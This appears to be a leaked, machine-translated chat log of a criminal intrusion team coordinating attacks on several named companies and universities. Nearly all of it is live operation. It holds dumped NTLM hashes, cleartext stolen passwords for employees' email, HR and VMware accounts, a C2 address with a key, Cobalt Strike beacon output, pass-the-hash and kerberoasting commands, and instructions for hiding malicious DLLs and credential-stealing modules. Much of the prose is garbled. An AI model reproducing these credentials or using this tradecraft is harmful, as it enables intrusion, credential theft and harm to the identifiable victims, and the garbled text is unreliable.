Pinging HQ259.MissMe.local [192.168.1.55] with 32 bytes of data:
Pinging HQ293.MissMe.local [192.168.1.50] with 32 bytes of data:
Pinging HQ266.MissMe.local [192.168.1.36] with 32 bytes of data:
Pinging HQ190.MissMe.local [192.168.1.33] with 32 bytes of data:
Pinging HQ405.MissMe.local [192.168.1.169] with 32 bytes of data:
``@user4
```
Pinging HQ126.MissMe.local [192.168.1.34] with 32 bytes of data:
Pinging HQ306.MissMe.local [192.168.1.30] with 32 bytes of data:
Pinging HQ601.MissMe.local [192.168.1.187] with 32 bytes of data:
Pinging HQ288.MissMe.local [192.168.1.35] with 32 bytes of data:
Pinging HQ602.MissMe.local [192.168.1.74] with 32 bytes of data:
Pinging HQ280.MissMe.local [192.168.3.57] with 32 bytes of data:
Pinging HQ228.MissMe.local [192.168.1.41] with 32 bytes of data:
Pinging HQ316.MissMe.local [192.168.3.51] with 32 bytes of data:
Pinging HQ217.MissMe.local [192.168.1.149] with 32 bytes of data:
Pinging HQ298.MissMe.local [192.168.1.47] with 32 bytes of data:

``@user3
```
Pinging HQ296.MissMe.local [192.168.1.65] with 32 bytes of data:
Pinging HQ277.MissMe.local [192.168.3.58] with 32 bytes of data:
Pinging HQ276.MissMe.local [192.168.1.20] with 32 bytes of data:
Pinging HQ147.MissMe.local [192.168.1.94] with 32 bytes of data:
Pinging HQ308.MissMe.local [192.168.1.32] with 32 bytes of data:
Pinging HQ201.MissMe.local [192.168.1.16] with 32 bytes of data:
Pinging KPNWH015.MissMe.local [192.168.1.19] with 32 bytes of data:
Pinging HQ312.MissMe.local [192.168.1.183] with 32 bytes of data:
Pinging HQ402.MissMe.local [192.168.1.175] with 32 bytes of data:
Pinging HQ299.MissMe.local [192.168.1.138] with 32 bytes of data:
``````
MissMe.local\JasonTak 20efb41d34a235754a4c9bb1bb15e7fe
MissMe.local\ThomasChang f5fecc2c183cea4c2a6537af2b3dd5c6
MissMe.local\MEGACOM a103a33e9e358a8e5eddc67a7c00e31e
``there is no need to write or discuss yourself immediately tell me the strategy to work well and let's count on it all servaks are real - virtualization is not toned down like only outlook and poppy backyatmalovato servers however) stat at the moment
cars - 344
of them
servers - 10 (9 alive 1 unavailable)
armors on the wind - 256 (now otpiguyut and opisu how many available) ` `
172.93.105.2:64998
gwWDMZ0hmfZLA9XadgWuMWu60ncW1O0ZxNg
````SDIFJOH&S*G6g6s8^TR&DVI%SVURY`user9user4user3 if it does not work @tl2 said not to mess with appleslashtormg well korbel now close and ask the guys to help, if something is missing I have not so much clears, have tried with hash passwords?all yes and all the LA from the servers tried brutal passwords yes to the account Admin? without domain@tl2 can try to brutalize accounts yes there? on vg nothing (no? Good night, get it? ok tomorrow a lot of work, maybe we'll close from scratchKopal cpcc.edu no result.  I have set up a vps, tomorrow I will bring everything up. I searched all over my surfboard and did not find any files and folders and just in case I had to roll out the os again.Pinged all that is pinged from the AD and scanned the balls on the pinged machines (in the conf. skipped).
Coba and empire sessions don't go up. i have already got the kit ready and wanted to try it then try psh empire`https://ucfapps.cloud.com/citrix/storeweb/`.
it worked in it, the data does not get everything, no way to run the exe, in ptsh only managed to pull the server, and that with its fucked up, in the coba is not pulled, I think about how to separate further, tomorrow I will try something else? 2 vps configured completely on the list
3 now in progress, here is the final stage, the empire is in conflict
made a template guide on how to configure

1 wpc given to @user3
1 is ready to be given away
1 will soon be ready to be given upafter tomorrow I expect you at 12:00 a.m. in 12 minutes at homewrite me the result of your work todaytake it there msf and psh empirethank you I'll give you 3 debiannaw what do you likecaw@user8 you like lincus? got it this weekend they brought a new one, I will move to it, this began to often hang up another computer? I will now install another computerthere I @user7? @user9 got sick
@user3 is late Where is everybody today? Not many of you...then I'll give you a new one. I don't know what to do with this grid.
there was also `healthcare.com`, but there, according to your arguments, got burned (nothing ran, no google chrome, no kmd, no psh)
in `unf.edu`, worked with it for a while and at one point the citrix credentials have changed, nothing yet? and now what about the tasks?[ ](https://mediaeveryone.com/channel/general?msg=Qdo9AtdEjZuyY5et4) you wrote that I have on my tasks kovyvayu asu.So what do you have on the tasks? and well)yes norms)well, how did you rest?
inside ad infos, hashes, creds.txt etc
```

```
And another thing, since the report will be an archive, next to the ad_*.txt files you make a file creds.txt in which
DCs
DA
EA
LA
cleartext creds if there are any
``If there are any, delete it:
```
include(script_resource("modules/insleep.cna"));
``````
popup beacon_bottom {
    menu "TW-toolkit"{
        
        include(script_resource("modules/checkvm.cna"));
        include(script_resource("modules/clearev.cna"));
        include(script_resource("modules/FireWall.cna"));
        include(script_resource("modules/persistence.cna"));
        include(script_resource("modules/RDP.cna"));
        include(script_resource("modules/Win2012mimikatz.cna"));
	include(script_resource("modules/cmd.cna"));
	include(script_resource("modules/sleep.cna"));
	include(script_resource("rdpthief/RdpThief.cna"));
	include(script_resource("modules/collect.cna"));
	include(script_resource("modules/chrome.cna"));
    }
}

``Only here or only here? Do you in the cobas also arrives? +, one left ... tense for the future, remove this plugin already removes sessions more than 1 minute asphyxiation just servak where YES for a long time or did not go at alla then seshchka offnut and all take a place on any server `` ``
nitial beacon from SYSTEM *@192.168.1.7 (DC-01)
``Why the slip? go to the server 1 team yes, already working with him, the second has just configured, accesses are distributed there slip put while I sort the files is mineThose in the general cob?+while we can re-sort what we got and msf to configure)))) it's not even the server? no sessions left at all? + well bnpmedia.com exactly + all fell off? dom.helpathome.com so in total, what is in work now? sort what we got earlier, then the rest are busy?only FRIVER.LOCAL is up and running now?[ ](https://mediaeveryone.com/channel/general?msg=vvBvMwABd6JENGyrv) what domain? FRIVER.LOCAL-+DIV420-4G350W2 (FRIVER.LOCAL)write down what online remained1minute+failed sessionTell me in sootvetstvennoy conf confine to throw allvatitoki write to confine from where hashine the fact kst that this local user no yuz all easierspawnas jump etc can be from other errors in the process check through the net use ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:15:59> spawnas .\Administrator Shotgun913 https
[*] Tasked beacon to spawn windows/beacon_https/reverse_https (regbest.com:443) as .\Administrator
[+] host called home, sent: 261167 bytes
[-] could not run C:\WINDOWS\system32\mstsc.exe as .\Administrator: 1326
Kernels look different so it's hashes) ah, I also uploaded kernels and there was also an admin who uploaded hash above...what to whom7 it's to whom?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4108e652bab10290df6e95cbdf7edbf5:::Shotgun913
``````
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:4108e652bab10290df6e95cbdf7edbf5:::
[+] ASPNET:1012:aad3b435b51404eeaad3b435b51404ee:e2ea6d8835d3d2a359a2799ef968ddfc:::
[+] Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] IUSR_COR-CRM-02:1009:0bf5649a7904243f88d27b3ca2c8f898:aa649f125693df03b2a571e208f27c91:::
[+] IWAM_COR-CRM-02:1010:5fd1256db0722b04b9718e35b2be2281:0e6b14839b56f9f18250a4349c1d9a9f:::
[+] SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:9c8006d35e9441ab3d8ca1883c0f3fdc:::
[+] ___VMware_Conv_SA___:1020:aad3b435b51404eeaad3b435b51404ee:b2bebb7eddaa6d58e30fc3665f85872a:::

``and then commands like this
wdigest
tspkg
kerberos
ssp
livessp
hashdump
``use mimikatz possible mimik to pullenum_utnand try to remove the module kobaThen the session does not fly in koboltot write while the results of the work in their confumb will be in the hash DAokey) now pour the case and will continue to search) yesEto the fact you pulled the server?well, okay) there is a matter of taste)He mne like my brother, we are with him from the first version together)))) or something like thatArmitage -View - TableDon't make the default awful in arma, by default a terrible viewkrtatysl shot out of turnsuzal msf for smb_login from his computer, will die?if no more local connects you can continue to work operatively)already just a session on the vpc and disconnect it good for you that you have made a breakthroughperfectly make the connection that you have received to pull? on these vpc why? yes you and said that deployed msfnahera i gave vpc under msf? question i drink somethingDo you also pulled on your pc before that?kzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzznmDa through a proxy. We didn't do it any other way. Through armitage did but it needs a session Seriously on your pc pulled or what? I'm through a proxy bindomili real shot? on the VPS? And seriously? Definitely shot on his own pbut do not say that on his pc pulled through?) and for `` For?
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 185.150.190.204:2103) at 2020-10-06 23:07:43 +0300

``I didn't look at it that way, but there are no strange groups))) thanks for the tip at least someone checked it out) no have you checked it out? but in ad users ivan has member_of strage_users and your username DOMAIN\ivan what you have in LA it says
DOMAIN\strange_uesser I'm talking to the localgroup Administrators or do you analyze the groups and look for the current user in the list? )))))))) by DOMAIN\uesser how do you determine LA? ok if you find something I will throw here in an hour, only in brute force will go to[ ](https://mediaeveryone.com/channel/general?msg=W4apDrxrep52uAxre) nice to hear that) yes-I think the system will soon pass too, right?we don't have any LA inputs from the current live sessions?+I hope everyone heard and all made notes on this point understood, a little later with grandfather check citrixnothing on your pc you do not deploy, do not connect, do not establish a connection, for this you all issued you or very poorly documented, or lazy to look or ask the guys stop if you through yourself soks put, you can and msf sessions to pull on themselves, why vpc gave out rdp, browsers, etc. and i said that i should work on the network through vpc proxies why do we need a winDoc you had a question if you remember everything is ok, i did not hook up I wrote a long time ago you wanted a citrix proxy hook up made in kobe do not say that from your PC you go to the network in foxecacom browsers and what proxies?I delete files immediately it's because of proxies that I prescribed in the browserAll he develops and chat))) well I read or understand it wrongWhy? He has a rocket chat hung up and he can not respond Well, how can he drop out of the chat and because of this in what question? What exactly he scans through a VPN? And how is it related? he scans for 17-10 mb that will fall out. and @user7 normal? oh, that's the first one I spammed and he just hung up) Dak I dunno) I do not remember that there would be something to do) So I clarify the grid for @user7 and you help him, I just asked whether you left the file or not) and @user7? and I worked there? I do not mind, but it hangs. file or left there? strange that you) someone is directly rushing to me)))))
```
10/06 20:37:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:38:32 *** initial beacon from abinash.pattnayak@192.168.9.85 (ABINASHP)
10/06 20:39:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:41:37 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:45:43 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:49:48 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:53:54 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:58:00 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:02:06 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:06:11 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:10:17 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:14:22 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:18:28 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:22:34 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:26:40 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:30:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:34:51 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:38:57 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:43:03 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:47:09 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:51:15 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:55:20 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:59:26 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:03:32 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:07:38 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:11:43 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:15:49 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:19:55 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:24:01 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:28:07 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:32:12 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:36:18 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:40:25 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:44:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:48:36 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
``I understand that it didn't come back, help user7@user3 didn't get to YES? in process--didn't get up to systems yet? or yes? i say ok or no after startup, you can't start it1 startup and all one time my cob session +
start working
```
dom.helpathome.com
``so this dampon did not say what, just said that he broke through svoitom how come back can you ask it? ``kiwi_cms'')) to the toilet where? he went out, do not ask (kiwi? svoitom what method? and all have tried his method?somewhere other than the grid @user3 were the rights systems?[ ](https://mediaeveryone.com/channel/general?msg=ZbXb97rLKmgmCG7Ff) judging by the name of the polzak may well be LA@user3 can help so far others took the session but have not yet checked because the sessions are falling off - looking for a less stable processThis is not enough! there were promises that the fuck it will be no free @user9 @user1 how are you doing? within an hour can come back as usual wait an hour there are 2 new sessions in the input cobaFailed skavot and do not see the vpn on and the pc is not in the domain at all how is the connection going to another name?how can I get a hellfind and still not find my machine?.immediately here is the name of the confabdisassembled in the coba came dead and new and then the questions, kerbs and other stuff is the scriptthe first message in the confab - DA, EA, LA, DC, ad infoDo yourself tutorial on "got the first session "What are you talking about?guys, honestly fucked repeating FIRST MESSAGE IN CONFECH SESSIONS back? in an hour will not arrive will be assigned to a couple on the current you from half an hour to an hour if it comes right away will notify let one of their monitors kobutozhe right, while waiting can help colleagues answer questions okay, while waiting bad (you said there was half a gig of information have you not archived?or there's a piece of AD info left there? what did you manage to remove? @user1 also wait mb will returndalf@user3 yours arrived? well, yes) so we took exactly the server segment and separated from it subsnets /24 /16subsnets not everything speaks the truth) but subsnets `>cn: 172.I have no trusts. is that normal? + now i will download everything and start 2? 3 people so far, what about dll launches?awaiting the groupbos ask yes@tl1 chetu.com i work feedback on dll, yes)give me a name, i will create a confab and give dlltoday i will definitely "live" network)who has a kilometer network, hands and head will not be redundantOkJdu if it does not come will work in parezhdy while you still 20 minutes it fell off do not see that he wrote it off here?I have noSession he hasWhat do you mean not distributed yet? Or yesterday's maybe now come[ ](https://mediaeveryone.com/channel/general?msg=qg5eoj5jnJsiEBbcx) catching in the first cobaSad[ ](https://mediaeveryone.com/channel/general?msg=W65dEW3796gimsBqt) means a lot of information)now maybe reopen1 to 1 noThere will be more sessions? the main thing is not too much noise the bigger the network the easier to work in it)fell off ska!@tl1 took ad_users not yet - is this normal grid? @tl1Povisley((((```
--- Chromium Credential (User: jessicak) ---
URL : https://mymails.chetu.com/owa/auth.owa
Username : jessicak@chetur.com
Password : Ll????

--- Chromium Credential (User: jessicak) ---
URL : https://mymails.chetu.com/owa/auth.owa
Username : jessicak@chetu.com
Password : /?X%W??m

--- Chromium Credential (User: jessicak) ---
URL : https://mail01.chetu.com/owa/auth.owa
Username : jessicak@chetu.com
Password : ?I36?U?

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username : jessicak@chetu.com
Password : /?2?P?????

--- Chromium Credential (User: jessicak) ---
URL : https://login.microsoftonline.com/887b9831-597d-4e43-9f75-9ac91b93a5a7/login
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : https://app4.trackmytime.com/chetupayroll
Username : jessicak
Password : Chetu@123

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et4rs@chetu.com
Password : TeamDMoney$7

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et3rs@chetu.com
Password : SolidDeal$9

--- Chromium Credential (User: jessicak) ---
URL : https://app.berqun.com/app/dist/login.html
Username :
Password : HelpTeam1

--- Chromium Credential (User: jessicak) ---
URL : javascript:;
Username : et@chetu.com
Password : Admin4U

--- Chromium Credential (User: jessicak) ---
URL : https://www.snapengage.com/signin
Username : et@chetu.com
Password : AdminTeam3

--- Chromium Credential (User: jessicak) ---
URL : http://review.chetu.com/LoginForm.aspx
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et7rs@chetu.com
Password : Team7Clo$e

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username :
Password : Acissej8733

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username : jessicak@chetu.com
Password : Acissej8733!

--- Chromium Credential (User: jessicak) ---
URL : http://backbone:9090/Human-Resources/Lists/Leave%20Management/AllItems.aspx
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : javascript:;
Username : et@chetu.com
Password : Admin4U

--- Chromium Credential (User: jessicak) ---
URL : https://fundraising.stjude.org/site/TRR/547026355
Username : Jkay8733
Password : Sweet@8733

[*] Finished Google Chrome extraction.
``@user4 silence@user7 took the session 2 more? and then suddenly on the desktop....)in the conf conf, before running the dll, write down where you putDo you run through the shell rundll32 so with , comma exactly need? so, I give 1 dll in the conf, on 1 pc run. criteria:
-hide it away in user folders (in %appdata%) a few levels deep and mask the name as synonymous with those where you put
-Run it like this `rundll32 FULL_PATH_THE_DOLL\IMA.dll, entryPoint`
-Check that it hasn't deleted
-write in conf that you run and check the source file ``.
execute-assembly /SharpChrome.exe logins /showall
``+looks like normal 4 two see Done Capture as user9 in the sweatshop has already said so fucking much +[ ](https://mediaeveryone.com/channel/general?msg=vNxoz7iD8gcZgQHSv) in the input cobbler only @user9 confirmed + waiting + in the input cobbler who has the network "checked" farther differently, one again cmd off, the second has 3 pc for analysis @user7 already 3 input sessions)Domain ad.happay.what on AD?
beacon> execute-assembly /home/user/tools/ShWeb/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===

[+] received output:
  [X] Exception: The parameter is incorrect.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.

``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===
  [X] Exception: The parameter is incorrect.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.

No rights in the conhost and swhost I can't get in.
```
adazure.app Administrator dhcpadmin.app
joomlatest1 joomlatest2 kassabp
kassabp.adm macmainw macmainw.adm
Nagelr.adm scriptadm.app Troysec.adm
usanet.adm
``Yeah, take off sharpwebfirefox the process list and adne thick``
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpChrome.exe logins /showall



--- Chrome Credential (Path: C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---

file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://editor.vev.design/,https://editor.vev.design/login,9/2/2020 4:11:19 PM,13243551079155078,,Piper16!

``as soon as you check immediately + in the noteproverifybnpmedia.com I also check the rest? without confirmation only 3 users noteFRIVER.LOCAL there is one more appearedvip.pet write here the domain to which to create confona works and glorovnodavshego to salaku what to do in there should not work? works as a tip `` ``
shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
``Can you give us a session?`` Try dotnet brute force or smb login no no it didn't work.``The point of smb through smb_login?`` And what about brute force?
beacon> execute-assembly /home/omar/Desktop/Fast-Guide/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \GPJ.LOC\sysvol\GPJ.LOC\policies\
```

I can't get an error, but there's no result, nothing happens. elevate seems to work SharpUp says - yes, guys, the user is a local admin, you can bypass yuacni Net-GPPPassword and winpis won't show it to gpj and won't let it in. such pies what haven't tried before now guys try everything from gostpack they don't workvatson shows two vulnerabilitiesrubeus and kerberost doesn't accept domain specified both gpj and gpj.I've tried with Semen to run a brute force attack with sharpshrome, it blames on the domain. what's the problem now?[ ](https://mediaeveryone.com/channel/general?msg=9jNJDKiXxwpxapwMa) eto ne taketo so progress?
1) Domain Admins.
2) Enterprise Admins
3) Local Admins
4) Ad Info
execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
``https://habr.com/ru/company/pt/blog/423903/выводит help does not work with parameter ``kerberoast````
execute-assembly /Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
```
Dumps all crb hashes, analog of script on ps`31d6cfe0d16ae931b73c59d7e0c089c0` is an empty string, remember! there are no users in AD with such a password, if you see such a ps, then the account is not workingsocreate to telnet,ssh,web,mssql,smb,rdp,vnc`ports 1-1024,3389,5900-6000`
why scan such a range? there are 900 empty ports and no mssql?
                           [02]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 3
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.59.12.209
                                 [02]: fe80::89c3:6e80:ed9e:ca27

``````
The VPN seemed to be active
```
If his process just hangs there, it does not mean that it is active) ok. will appear - let's try the same as in the classic with cisco clients in generalvpn, I think, was active or LDAP tied there or through the RADIUS is authorizedWe kind of just discussed this point with Fortigate client, the point is that connecting through the Wpn via Fortigate client through the "domain" creeds occurs and connect the machine to the domainTo see the domainConnect through wpn@tl1 , while there is time, can you tell me how to be in the network matches? I can not see the DC there. Any thoughts on this?
(ICMP) Target '172.16.200.1' is alive. [read 8 bytes]

[+] received output:
172.16.200.1:139
172.16.200.1:135

[+] received output:
172.16.200.1:445
``.
And if they're also pinged, they're the ones you should be aiming at ``.
beacon> run net use * "\192.168.168.10\Shares" /persistent:no /user:PKGPROD\jess 0204
[*] Tasked beacon to run: net use * "\192.168.168.10\Shares" /persistent:no /user:PKGPROD\jess 0204
[+] host called home, sent: 92 bytes
[+] received output:
Drive Z: is now connected to \192.168.168.10\Shares.

The command completed successfully.

``Don't bother to think about it)``like if they do it there will be 1.5 pc? but now I do not understand about the packaging in general? read that they were serviced not so readHow did the idea that they could serve someone.  I told you above that they were in service with a company that provides a range of IT services including PC maintenance.so? oh fuck)))))) These guys were in the packaging business.were they serviced or serviced? wtf

```
tl1
Team Lead 1 @tl1
Admin
Owner
02:51
service company for PCs and other things
consists of 20 PC's)

``Composed of 20 PCs) a company that provides services to PCs and other wickednessThey were serviced by a company that provides services to PCs and other wickednessNo one sees the forest of domains? And what makes you think that DMX somehow related to them?[ ](https://mediaeveryone.com/group/itc-us-com?msg=Boet2zFtPiCYxiBHP) in hell info 20 PCs, no doubts? AV lab some more than this network, how does it even work and keeps the site?) There was not a hint of itThe subnet look was also the domain DMX ``.
.168.5.13:445

[+] received output:
192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
192.168.5.23:445
192.168.5.24:445

[+] received output:
192.168.5.25:445
192.168.5.26:445
192.168.5.27:445
192.168.5.28:445
192.168.5.30:445

[+] received output:
192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP)
192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX)

[+] received output:
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.188:445
``1) and there is no guarantee that in another subnet were not the wind hosts from that domain? They are all in another subnet which was not a hint in the one with which they worked, + NN - hydrogenvgworkgroupThat * + N vgshek even in the subnet where were * This domain would NEVER know if we do not suffer the fuck) at least there was another domain + N vgshek even in the subnet where were pkgprod gone to shit?If everything goes fucked up again as in pkgprod tomorrow, we'll have a serious talk with everyone, even if you do everything well and cover all the servers and everything that's online + What's wrong with running it? If we run it in 4, we'll spend half a day here. go to work tomorrow)? Tomorrow is a day off))) max 42 hours to start the build if there is a variant go to the new ones anyway, this is a waste of time if 2 hours to search for information2 hours to what? then run us another 2 hours here DOUBLE WINDEF AND START EXECUTION what have we here?[ ](https://mediaeveryone.com/group/itc-us-com?msg=p8XMqsLRzJ3xcFWeu) on one user this error, another user finds :man_shrugging: concluded that this error - nothing was found.
get-eventlog "Security" | where {$_.Message -like "*login*" -AND "Source Network Address"} | export-csv C:\windows\temp\user.csv
``So there's an error here on the tula itself.``
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin ITC\br_admin CAKE@horse369!@@
[*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin ITC\br_admin CAKE@horse369!@@
[+] host called home, sent: 113785 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin ITC\egl_admin E@gle@x1s3030
[*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin ITC\egl_admin E@gle@x1s3030
[+] host called home, sent: 113781 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe johnnyp ITC\br_admin CAKE@horse369!@@
[*] Tasked beacon to run .NET program: SharpSniper.exe johnnyp ITC\br_admin CAKE@horse369!@@
[+] host called home, sent: 113781 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

Try the classic one, but the sniper still does not show up We know that he is logged into some dkou, some he is looking for) when the last logon was last logon And look at net center Try also specifying another user to search for Try and with direct credentials In the last case it worked like that in other networks with a token did it work fine Have you tried with direct credentials? did you test in laba tool? just login of the one you're looking for,the syntax on git is like this)user -?``
beacon> pth ITC\br_admin 555601b2d489ec2bfb7d189544736c8b
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:br_admin /domain:ITC /ntlm:555601b2d489ec2bfb7d189544736c8b /run:"%COMSPEC% /c echo 90835b1e435 > \.\pipe\06c1fb" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : br_admin
domain : ITC
program : C:\Windows\system32\cmd.exe /c echo 90835b1e435 > \\.\pipe\06c1fb
impers. : no
NTLM : 555601b2d489ec2bfb7d189544736c8b
  | PID 28132
  | TID 127016
  | LSA Process is now R/W
  | LUID 0 ; 1041160668 (00000000:3e0ed9dc)
  \_ msv1_0 - data copy @ 0000025C26677D20 : OK !
  \kerberos - data copy @ 0000025C279CE058
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 0000025C2CCF4598 (32) -> null

beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin
[*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin
[+] host called home, sent: 113725 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
``with the token.../SharpSniper.exe [User]what do you specify? and how do you look for? well, the sniper looks at the logstipo logs are not written on the dk?
>In events on the dk does not write (sharpsniper) in events on the dk does not write (sharpsniper)
through powerview only finds it on the rc\dk
in ad_computer no computers with hints of admin
except one, but he cd not available) and search for admins pc? admins go to rdc, dk on rdp obscure where workstation
i had them yesterday still chekatatam computers just with the prefix wsa comps like ITITC-LMAO no why search the servers at all? pc itshnikov empty? soobsnabolshe in chrome history on the servers no from a machine `ITCMA-RDS01 ` to av went polzak ` SLEAdmin `
```
http://anywhere.webrootcloudav.com/zerol/wsasmekevalalpha.exe8
```
```
http://downbox.webrootanywhere.com/wsasmeexe/022AENTP19F2B7A74491exe
```
```
http://anywhere.webrootcloudav.com/zerol/wsasmekevalalpha.exehttp://webrootcloudav.com/
``[ ](https://mediaeveryone.com/group/itc-us-com?msg=iLMih4xmBT6FFRfGN) I mean the AV,
he goes here without a problem, but there's no management, purely logical
```
https://my.vmware.com/
``````
administrator@vsphere.local
```
from vsphere, the password does not fit[ ](https://mediaeveryone.com/group/itc-us-com?msg=NaahsFk2RtTbvzou5) did not log in? and where the access saved? on all servers and more or less technical PCs looked[ ](https://mediaeveryone.com/group/itc-us-com?msg=39MCkb4mf4KJgqGoE) he did not log in from this dk, and in general where he logged in not found anyway check this pathwhy? just confirm adding device+even if the device has already logged in?i don't know how it works with AV muzzles but sim and tv always need the code i think that only when logging in from an unknown place why? if the browser fingerprint is saved or do you think they get the code every time? no? code from a cell phone anvey need it in AV it is not logged in take chrome) and deploy it on the desktop under sopsom i will check if there is a session ```
C:\Users\egl_adminAppData\Local\Google\Chrome\User Data\Default\Login Data,https://my.vmware.com/,https://my.vmware.com/web/vmware/login,7/15/2020 9:05:52 AM,13239291952720834,stevev@egltech.net,B00b00licious
``10.0.0.38 in chrome in the file? dkITCMA-FILE02[ ](https://mediaeveryone.com/group/itc-us-com?msg=nk9CPM5CPDJNBxDwP) they will also fit to vsphere with 90% from where they were taken? :zany_face:``
stevev@egltech.net
B00b00licious
```
yeah, it's a creds from av, but you need a two-factor there ```
https://my.vmware.com/web/vmware/login
stevev@egltech.net
B00b00licious
```
oooo
